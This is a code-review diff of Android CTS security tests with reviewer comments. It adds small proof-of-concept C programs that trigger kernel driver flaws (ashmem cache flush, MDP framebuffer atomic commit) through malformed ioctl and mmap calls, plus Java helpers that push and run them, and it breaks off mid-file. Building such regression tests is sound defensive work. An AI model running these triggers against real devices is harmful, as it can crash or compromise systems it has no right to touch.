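Review bot: In `poc()`, `control` reaches `SNDRV_CTL_IOCTL_ELEM_WRITE` without being zeroed, so everything except `value[0]` and `id.numid` is indeterminate stack data and the run is not repeatable; add `memset(&control, 0, sizeof(control));` before the assignment. `calloc(MAXELE, sizeof(struct snd_ctl_elem_list))` sizes the array by the list struct rather than its element type, is not checked and is never freed; `calloc(MAXELE, sizeof(*lst.pids))` plus a NULL check and `free(lst.pids);` before `close(fd)` would fix that. The loop runs to `lst.count`, but I would expect only `lst.used` entries of `pids` to be filled in, so the bound should probably be `lst.used`. `CONTBL`, `OPPCM`, `freeptr()`, the locals `i` and `pcmfd`, and the loop in `main()` that breaks after one call are dead code and can go.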
diff --git a/hostsidetests/security/securityPatch/CVE-2017-8263/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-8263/Android.mk
new file mode 100644
index 0000000..0d1d60b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-8263/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-8263
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-8263/local_poc.h b/hostsidetests/security/securityPatch/CVE-2017-8263/local_poc.h
new file mode 100644
index 0000000..a75782b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-8263/local_poc.h
@@ -0,0 +1,50 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#ifndef _LINUX_ASHMEM_H
+#define _LINUX_ASHMEM_H
+#include <linux/limits.h>
+#include <linux/ioctl.h>
+#define ASHMEM_NAME_LEN 256
+#define ASHMEM_NAME_DEF "dev/ashmem"
+ /* Return values from ASHMEM_PIN: Was the mapping purged while unpinned? */
+#define ASHMEM_NOT_PURGED 0
+#define ASHMEM_WAS_PURGED 1
+ /* Return values from ASHMEM_GET_PIN_STATUS: Is the mapping pinned? */
+#define ASHMEM_IS_UNPINNED 0
+#define ASHMEM_IS_PINNED 1
+struct ashmem_pin {
+ __u32 offset; /* offset into region, in bytes, page-aligned */
+ __u32 len; /* length forward from offset, in bytes, page-aligned */
+};
+#define __ASHMEMIOC 0x77
+#define ASHMEM_SET_NAME _IOW(__ASHMEMIOC, 1, char[ASHMEM_NAME_LEN])
+#define ASHMEM_GET_NAME _IOR(__ASHMEMIOC, 2, char[ASHMEM_NAME_LEN])
+#define ASHMEM_SET_SIZE _IOW(__ASHMEMIOC, 3, size_t)
+#define ASHMEM_GET_SIZE _IO(__ASHMEMIOC, 4)
+#define ASHMEM_SET_PROT_MASK _IOW(__ASHMEMIOC, 5, unsigned long)
+#define ASHMEM_GET_PROT_MASK _IO(__ASHMEMIOC, 6)
+#define ASHMEM_PIN _IOW(__ASHMEMIOC, 7, struct ashmem_pin)
+#define ASHMEM_UNPIN _IOW(__ASHMEMIOC, 8, struct ashmem_pin)
+#define ASHMEM_GET_PIN_STATUS _IO(__ASHMEMIOC, 9)
+#define ASHMEM_PURGE_ALL_CACHES _IO(__ASHMEMIOC, 10)
+#define ASHMEM_CACHE_FLUSH_RANGE _IO(__ASHMEMIOC, 11)
+#define ASHMEM_CACHE_CLEAN_RANGE _IO(__ASHMEMIOC, 12)
+#define ASHMEM_CACHE_INV_RANGE _IO(__ASHMEMIOC, 13)
+int get_ashmem_file(int fd, struct file **filp, struct file **vm_file,
+ unsigned long *len);
+void put_ashmem_file(struct file *file);
+#endif /* _LINUX_ASHMEM_H */
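Review bot: This header reuses the include guard `_LINUX_ASHMEM_H`, which is the name a kernel ashmem header would use, so if `<linux/ashmem.h>` is ever included first the whole file is skipped silently; a test-local guard such as `#ifndef CVE_2017_8263_LOCAL_POC_H` avoids that. The prototypes `get_ashmem_file()` and `put_ashmem_file()` at the end take `struct file`, which has no userspace definition, and poc.c does not call them, so they should be removed. `__u32` is used in `struct ashmem_pin` without including `<linux/types.h>`; it presumably arrives through another include, but the header should pull it in itself.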
diff --git a/hostsidetests/security/securityPatch/CVE-2017-8263/poc.c b/hostsidetests/security/securityPatch/CVE-2017-8263/poc.c
new file mode 100644
index 0000000..687bbc5
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-8263/poc.c
@@ -0,0 +1,51 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <fcntl.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <stdio.h>
+#include "local_poc.h"
+
+
+int main() {
+ int fd;
+ int ret;
+ uint64_t mmap_ret;
+
+ fd = open("/dev/ashmem", 0, 0);
+ if (fd < 0) {
+ return -1;
+ }
+
+ ret = ioctl(fd, ASHMEM_SET_SIZE, 0x1000);
+ if (ret < 0) {
+ return -1;
+ }
+
+ mmap_ret = (uint64_t) mmap((void *) 0x7f0000000 /*addr*/, 0x1000 /*length*/, 0x0 /*prot*/,
+ 0x12 /*flags=MAP_FIXED|MAP_PRIVATE*/, fd, 0x0 /*offset*/);
+ if (mmap_ret == MAP_FAILED) {
+ return -1;
+ }
+
+ ret = ioctl(fd, ASHMEM_CACHE_FLUSH_RANGE, NULL);
+ if (ret < 0) {
+ return -1;
+ }
+ return 0;
+}
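Review bot: The `mmap()` result is cast to `uint64_t` and then compared with the pointer `MAP_FAILED`, so `if (mmap_ret == MAP_FAILED)` is an integer/pointer comparison whose outcome depends on how the cast extends the value in the 32-bit build; keep it as a pointer with `void *map = mmap(...);` and `if (map == MAP_FAILED)`. `uint64_t` is also used without `<stdint.h>`. The module is built with `LOCAL_MULTILIB := both`, and the fixed address `0x7f0000000` does not fit in a 32-bit pointer, so it is truncated there; a comment should say whether the 32-bit binary is expected to get past the mapping step. `fd` is not closed on any return path.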
diff --git a/hostsidetests/security/securityPatch/CVE-2017-9678/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-9678/Android.mk
new file mode 100644
index 0000000..0a5b344
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-9678/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-9678
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-9678/poc.c b/hostsidetests/security/securityPatch/CVE-2017-9678/poc.c
new file mode 100644
index 0000000..beb7cc8
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-9678/poc.c
@@ -0,0 +1,131 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define GNU_SOURCE
+#include <fcntl.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <unistd.h>
+#include <string.h>
+
+#ifndef _IOC_NONE
+#define _IOC_NONE 0U
+#endif
+
+#ifndef _IOC_WRITE
+#define _IOC_WRITE 1U
+#endif
+
+#ifndef _IOC_READ
+#define _IOC_READ 2U
+#endif
+
+#define _IOC_NRBITS 8
+#define _IOC_TYPEBITS 8
+
+#ifndef _IOC_SIZEBITS
+#define _IOC_SIZEBITS 14
+#endif
+
+#ifndef _IOC_DIRBITS
+#define _IOC_DIRBITS 2
+#endif
+
+#define _IOC_NRMASK ((1 << _IOC_NRBITS) - 1)
+#define _IOC_TYPEMASK ((1 << _IOC_TYPEBITS) - 1)
+#define _IOC_SIZEMASK ((1 << _IOC_SIZEBITS) - 1)
+#define _IOC_DIRMASK ((1 << _IOC_DIRBITS) - 1)
+
+#define _IOC_NRSHIFT 0
+#define _IOC_TYPESHIFT (_IOC_NRSHIFT + _IOC_NRBITS)
+#define _IOC_SIZESHIFT (_IOC_TYPESHIFT + _IOC_TYPEBITS)
+#define _IOC_DIRSHIFT (_IOC_SIZESHIFT + _IOC_SIZEBITS)
+
+#define _IOC(dir, type, nr, size) \
+ (((dir) << _IOC_DIRSHIFT) | ((type) << _IOC_TYPESHIFT) | \
+ ((nr) << _IOC_NRSHIFT) | ((size) << _IOC_SIZESHIFT))
+
+#ifndef __KERNEL__
+#define _IOC_TYPECHECK(t) (sizeof(t))
+#endif
+
+#define _IO(type, nr) _IOC(_IOC_NONE, (type), (nr), 0)
+#define _IOR(type, nr, size) \
+ _IOC(_IOC_READ, (type), (nr), (_IOC_TYPECHECK(size)))
+#define _IOW(type, nr, size) \
+ _IOC(_IOC_WRITE, (type), (nr), (_IOC_TYPECHECK(size)))
+#define _IOWR(type, nr, size) \
+ _IOC(_IOC_READ | _IOC_WRITE, (type), (nr), (_IOC_TYPECHECK(size)))
+#define _IOR_BAD(type, nr, size) _IOC(_IOC_READ, (type), (nr), sizeof(size))
+#define _IOW_BAD(type, nr, size) _IOC(_IOC_WRITE, (type), (nr), sizeof(size))
+#define _IOWR_BAD(type, nr, size) \
+ _IOC(_IOC_READ | _IOC_WRITE, (type), (nr), sizeof(size))
+
+#define MDP_IOCTL_MAGIC 'S'
+/* atomic commit ioctl used for validate and commit request */
+#define MSMFB_ATOMIC_COMMIT _IOWR(MDP_IOCTL_MAGIC, 128, void *)
+
+struct mdp_rect {
+ uint32_t x;
+ uint32_t y;
+ uint32_t w;
+ uint32_t h;
+};
+
+typedef unsigned int u32;
+
+typedef u32 compat_caddr_t;
+
+struct mdp_layer_commit_v1_32 {
+ uint32_t flags;
+ int release_fence;
+ struct mdp_rect left_roi;
+ struct mdp_rect right_roi;
+ compat_caddr_t input_layers;
+ uint32_t input_layer_cnt;
+ compat_caddr_t output_layer;
+ int retire_fence;
+ uint32_t reserved[6];
+};
+
+struct mdp_layer_commit32 {
+ uint32_t version;
+ union {
+ struct mdp_layer_commit_v1_32 commit_v1;
+ };
+};
+
+int main() {
+ int fd;
+ int ret;
+ struct mdp_layer_commit32 mlc;
+
+ memset(&mlc, 0, sizeof(struct mdp_layer_commit32));
+
+ fd = open("/dev/graphics/fb0", O_RDWR);
+
+ if (fd < 0) {
+ return -1;
+ }
+
+ ret = ioctl(fd, MSMFB_ATOMIC_COMMIT, &mlc);
+ close(fd);
+
+ return 0;
+}
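Review bot: `#define GNU_SOURCE` at the top is missing the leading underscore, so it defines an unused macro instead of the `_GNU_SOURCE` feature-test macro; the same line is in the CVE-2017-9692 poc.c. The block of `_IOC_*`, `_IO`, `_IOR`, `_IOW` and `_IOWR` definitions redefines, mostly without `#ifndef`, macros that `<sys/ioctl.h>` is expected to provide already, so I would delete it and keep only `MDP_IOCTL_MAGIC` and `MSMFB_ATOMIC_COMMIT`. `uint32_t` needs `<stdint.h>`, and `ret` in `main()` is assigned but never read, so it can be dropped.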
diff --git a/hostsidetests/security/securityPatch/CVE-2017-9692/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-9692/Android.mk
new file mode 100644
index 0000000..fa5539b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-9692/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-9692
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-9692/poc.c b/hostsidetests/security/securityPatch/CVE-2017-9692/poc.c
new file mode 100644
index 0000000..7b4de81
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-9692/poc.c
@@ -0,0 +1,209 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define GNU_SOURCE
+#include <errno.h>
+#include <fcntl.h>
+#include <linux/types.h>
+#include <pthread.h>
+#include <stdio.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <unistd.h>
+
+#ifndef _IOC_NONE
+#define _IOC_NONE 0U
+#endif
+
+#ifndef _IOC_WRITE
+#define _IOC_WRITE 1U
+#endif
+
+#ifndef _IOC_READ
+#define _IOC_READ 2U
+#endif
+
+#define _IOC_NRBITS 8
+#define _IOC_TYPEBITS 8
+
+#ifndef _IOC_SIZEBITS
+#define _IOC_SIZEBITS 14
+#endif
+
+#ifndef _IOC_DIRBITS
+#define _IOC_DIRBITS 2
+#endif
+
+#define _IOC_NRMASK ((1 << _IOC_NRBITS) - 1)
+#define _IOC_TYPEMASK ((1 << _IOC_TYPEBITS) - 1)
+#define _IOC_SIZEMASK ((1 << _IOC_SIZEBITS) - 1)
+#define _IOC_DIRMASK ((1 << _IOC_DIRBITS) - 1)
+
+#define _IOC_NRSHIFT 0
+#define _IOC_TYPESHIFT (_IOC_NRSHIFT + _IOC_NRBITS)
+#define _IOC_SIZESHIFT (_IOC_TYPESHIFT + _IOC_TYPEBITS)
+#define _IOC_DIRSHIFT (_IOC_SIZESHIFT + _IOC_SIZEBITS)
+
+#define _IOC(dir, type, nr, size) \
+ (((dir) << _IOC_DIRSHIFT) | ((type) << _IOC_TYPESHIFT) | \
+ ((nr) << _IOC_NRSHIFT) | ((size) << _IOC_SIZESHIFT))
+
+#ifndef __KERNEL__
+#define _IOC_TYPECHECK(t) (sizeof(t))
+#endif
+
+#define _IO(type, nr) _IOC(_IOC_NONE, (type), (nr), 0)
+#define _IOR(type, nr, size) \
+ _IOC(_IOC_READ, (type), (nr), (_IOC_TYPECHECK(size)))
+#define _IOW(type, nr, size) \
+ _IOC(_IOC_WRITE, (type), (nr), (_IOC_TYPECHECK(size)))
+#define _IOWR(type, nr, size) \
+ _IOC(_IOC_READ | _IOC_WRITE, (type), (nr), (_IOC_TYPECHECK(size)))
+#define _IOR_BAD(type, nr, size) _IOC(_IOC_READ, (type), (nr), sizeof(size))
+#define _IOW_BAD(type, nr, size) _IOC(_IOC_WRITE, (type), (nr), sizeof(size))
+#define _IOWR_BAD(type, nr, size) \
+ _IOC(_IOC_READ | _IOC_WRITE, (type), (nr), sizeof(size))
+
+#define MDP_IOCTL_MAGIC 'S'
+#define MSMFB_ATOMIC_COMMIT _IOWR(MDP_IOCTL_MAGIC, 128, void *)
+
+#define MDP_COMMIT_VERSION_1_0 0x00010000
+#define MDP_VALIDATE_LAYER 0x01
+
+#ifdef __LP64
+#define MDP_LAYER_COMMIT_V1_PAD 3
+#else
+#define MDP_LAYER_COMMIT_V1_PAD 4
+#endif
+
+#define MAX_PLANES 4
+
+struct mult_factor {
+ uint32_t numer;
+ uint32_t denom;
+};
+
+enum mdp_color_space {
+ MDP_CSC_ITU_R_601,
+ MDP_CSC_ITU_R_601_FR,
+ MDP_CSC_ITU_R_709,
+};
+
+enum mdss_mdp_blend_op {
+ BLEND_OP_NOT_DEFINED = 0,
+ BLEND_OP_OPAQUE,
+ BLEND_OP_PREMULTIPLIED,
+ BLEND_OP_COVERAGE,
+ BLEND_OP_MAX,
+};
+
+struct mdp_rect {
+ uint32_t x;
+ uint32_t y;
+ uint32_t w;
+ uint32_t h;
+};
+
+struct mdp_layer_plane {
+ int fd;
+ uint32_t offset;
+ uint32_t stride;
+};
+
+struct mdp_layer_commit_v1 {
+ uint32_t flags;
+ int release_fence;
+ struct mdp_rect left_roi;
+ struct mdp_rect right_roi;
+ struct mdp_input_layer __user *input_layers;
+ uint32_t input_layer_cnt;
+ struct mdp_output_layer __user *output_layer;
+ int retire_fence;
+ void __user *dest_scaler;
+ uint32_t dest_scaler_cnt;
+ uint32_t reserved[MDP_LAYER_COMMIT_V1_PAD];
+};
+
+struct mdp_layer_commit {
+ uint32_t version;
+ union {
+ struct mdp_layer_commit_v1 commit_v1;
+ };
+};
+
+struct mdp_layer_buffer {
+ uint32_t width;
+ uint32_t height;
+ uint32_t format;
+ struct mdp_layer_plane planes[MAX_PLANES];
+ uint32_t plane_count;
+ struct mult_factor comp_ratio;
+ int fence;
+ uint32_t reserved;
+};
+
+struct mdp_output_layer {
+ uint32_t flags;
+ uint32_t writeback_ndx;
+ struct mdp_layer_buffer buffer;
+ enum mdp_color_space color_space;
+ uint32_t reserved[5];
+};
+
+struct mdp_input_layer {
+ uint32_t flags;
+ uint32_t pipe_ndx;
+ uint8_t horz_deci;
+ uint8_t vert_deci;
+ uint8_t alpha;
+ uint16_t z_order;
+ uint32_t transp_mask;
+ uint32_t bg_color;
+ enum mdss_mdp_blend_op blend_op;
+ enum mdp_color_space color_space;
+ struct mdp_rect src_rect;
+ struct mdp_rect dst_rect;
+ void __user *scale;
+ struct mdp_layer_buffer buffer;
+ void __user *pp_info;
+ int error_code;
+ uint32_t reserved[6];
+};
+
+int main() {
+ int fd;
+ struct mdp_layer_commit commit;
+ struct mdp_output_layer output_layer;
+
+ fd = open("/dev/graphics/fb2", O_RDWR, 0);
+ if (fd < 0) {
+ return -1;
+ }
+
+ memset(&commit, 0, sizeof(struct mdp_layer_commit));
+ commit.version = MDP_COMMIT_VERSION_1_0;
+
+ memset(&output_layer, 0, sizeof(output_layer));
+ commit.commit_v1.output_layer = (struct mdp_output_layer *)NULL;
+ commit.commit_v1.flags |= MDP_VALIDATE_LAYER;
+ ioctl(fd, MSMFB_ATOMIC_COMMIT, &commit);
+
+ return 0;
+}
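Review bot: `#ifdef __LP64` tests a name that, as far as I know, compilers do not predefine (GCC and Clang define `__LP64__` and `_LP64`), so `MDP_LAYER_COMMIT_V1_PAD` is always 4 and the 64-bit build gets the 32-bit padding in `struct mdp_layer_commit_v1`. If this was copied verbatim so the layout matches the driver's own header, add a comment saying so; otherwise it should read `#ifdef __LP64__`. In `main()`, `output_layer` is zeroed but never attached to `commit`, and `fd` is never closed; remove the unused local or add `/* output_layer is deliberately left NULL */`, and add `close(fd);` before returning.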
diff --git a/hostsidetests/security/src/android/security/cts/AdbUtils.java b/hostsidetests/security/src/android/security/cts/AdbUtils.java
index f6a6f61..7670e61 100644
--- a/hostsidetests/security/src/android/security/cts/AdbUtils.java
+++ b/hostsidetests/security/src/android/security/cts/AdbUtils.java
@@ -16,6 +16,7 @@
package android.security.cts;
+import com.android.ddmlib.NullOutputReceiver;
import com.android.tradefed.device.CollectingOutputReceiver;
import com.android.tradefed.device.DeviceNotAvailableException;
import com.android.tradefed.device.ITestDevice;
@@ -60,7 +61,7 @@
/**
* Pushes and runs a binary to the selected device
*
- * @param pathToPoc a string path to poc from the /res folder
+ * @param pocName a string path to poc from the /res folder
* @param device device to be ran on
* @param timeout time to wait for output in seconds
* @return the console output from the binary
@@ -74,6 +75,21 @@
}
/**
+ * Pushes and runs a binary to the selected device and ignores any of its output.
+ *
+ * @param pocName a string path to poc from the /res folder
+ * @param device device to be ran on
+ * @param timeout time to wait for output in seconds
+ */
+ public static void runPocNoOutput(String pocName, ITestDevice device, int timeout)
+ throws Exception {
+ device.executeShellCommand("chmod +x /data/local/tmp/" + pocName);
+ NullOutputReceiver receiver = new NullOutputReceiver();
+ device.executeShellCommand("/data/local/tmp/" + pocName, receiver, timeout,
+ TimeUnit.SECONDS, 0);
+ }
+
+ /**
* Pushes and installs an apk to the selected device
*
* @param pathToApk a string path to apk from the /res folder
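Review bot: `runPocNoOutput` builds both shell commands by concatenating `pocName` unquoted into the command string, so a name containing spaces or shell metacharacters would run something other than the pushed binary. The callers in this commit pass literals, but the helper is public, so I would reject anything that is not a bare file name up front, e.g. `if (!pocName.matches("[A-Za-z0-9._-]+")) throw new IllegalArgumentException(pocName);`. The Javadoc also describes `pocName` as "a string path to poc from the /res folder" although it is used as a file name under /data/local/tmp, and `timeout` as "time to wait for output" although the output is discarded; both should be reworded.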
@@ -121,7 +137,8 @@
* @return boolean returns false if the test fails, otherwise returns true
**/
public static boolean detectInformationDisclosure(
- String pocName, ITestDevice device, int timeout, String pattern) throws Exception {
+ String pocName, ITestDevice device, int timeout,
+ String pattern) throws Exception {
String pocOutput = runPoc(pocName, device, timeout);
if (Pattern.matches(pattern, pocOutput))
diff --git a/hostsidetests/security/src/android/security/cts/Poc16_12.java b/hostsidetests/security/src/android/security/cts/Poc16_12.java
index a6160d5..7e24e8f 100644
--- a/hostsidetests/security/src/android/security/cts/Poc16_12.java
+++ b/hostsidetests/security/src/android/security/cts/Poc16_12.java
@@ -133,7 +133,8 @@
@SecurityTest
public void testPocCVE_2016_8434() throws Exception {
if(containsDriver(getDevice(), "/dev/kgsl-3d0")) {
- AdbUtils.runPoc("CVE-2016-8434", getDevice(), 60);
+ // This poc is very verbose so we ignore the output to avoid using a lot of memory.
+ AdbUtils.runPocNoOutput("CVE-2016-8434", getDevice(), 60);
}
}
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_02.java b/hostsidetests/security/src/android/security/cts/Poc17_02.java
new file mode 100644
index 0000000..4f22f3b
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc17_02.java
@@ -0,0 +1,34 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+@SecurityTest
+public class Poc17_02 extends SecurityTestCase {
+
+ /**
+ * b/31796345
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0451() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/voice_svc")) {
+ AdbUtils.runPoc("CVE-2017-0451", getDevice(), 60);
+ }
+ }
+}
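Review bot: `testPocCVE_2017_0451` contains no assertion and returns normally when `/dev/voice_svc` is missing, so this hunk does not show what makes the test fail on an affected device or how a run that was skipped differs from a pass. If the verdict comes from `SecurityTestCase` (not shown here), a short comment should say so, for example `// Verdict is decided by SecurityTestCase, not by this method` with the actual mechanism filled in, and the driver-absent branch should at least log that nothing was exercised. The same pattern runs through Poc17_04, Poc17_06 and Poc17_07 added by this commit. `@SecurityTest` is also applied to both the class and the method, one of which is presumably redundant.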
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_04.java b/hostsidetests/security/src/android/security/cts/Poc17_04.java
new file mode 100644
index 0000000..e89a45a
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc17_04.java
@@ -0,0 +1,99 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+public class Poc17_04 extends SecurityTestCase {
+
+ /**
+ * b/33544431
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0576() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/qce")) {
+ AdbUtils.runPoc("CVE-2017-0576", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/34325986
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0580() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/touch_fwu")) {
+ AdbUtils.runPoc("CVE-2017-0580", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/33353601
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0462() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/seemplog")) {
+ AdbUtils.runPoc("CVE-2017-0462", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/33842951
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0577() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/touch_fwu")) {
+ AdbUtils.runPoc("CVE-2017-0577", getDevice(), 60);
+ }
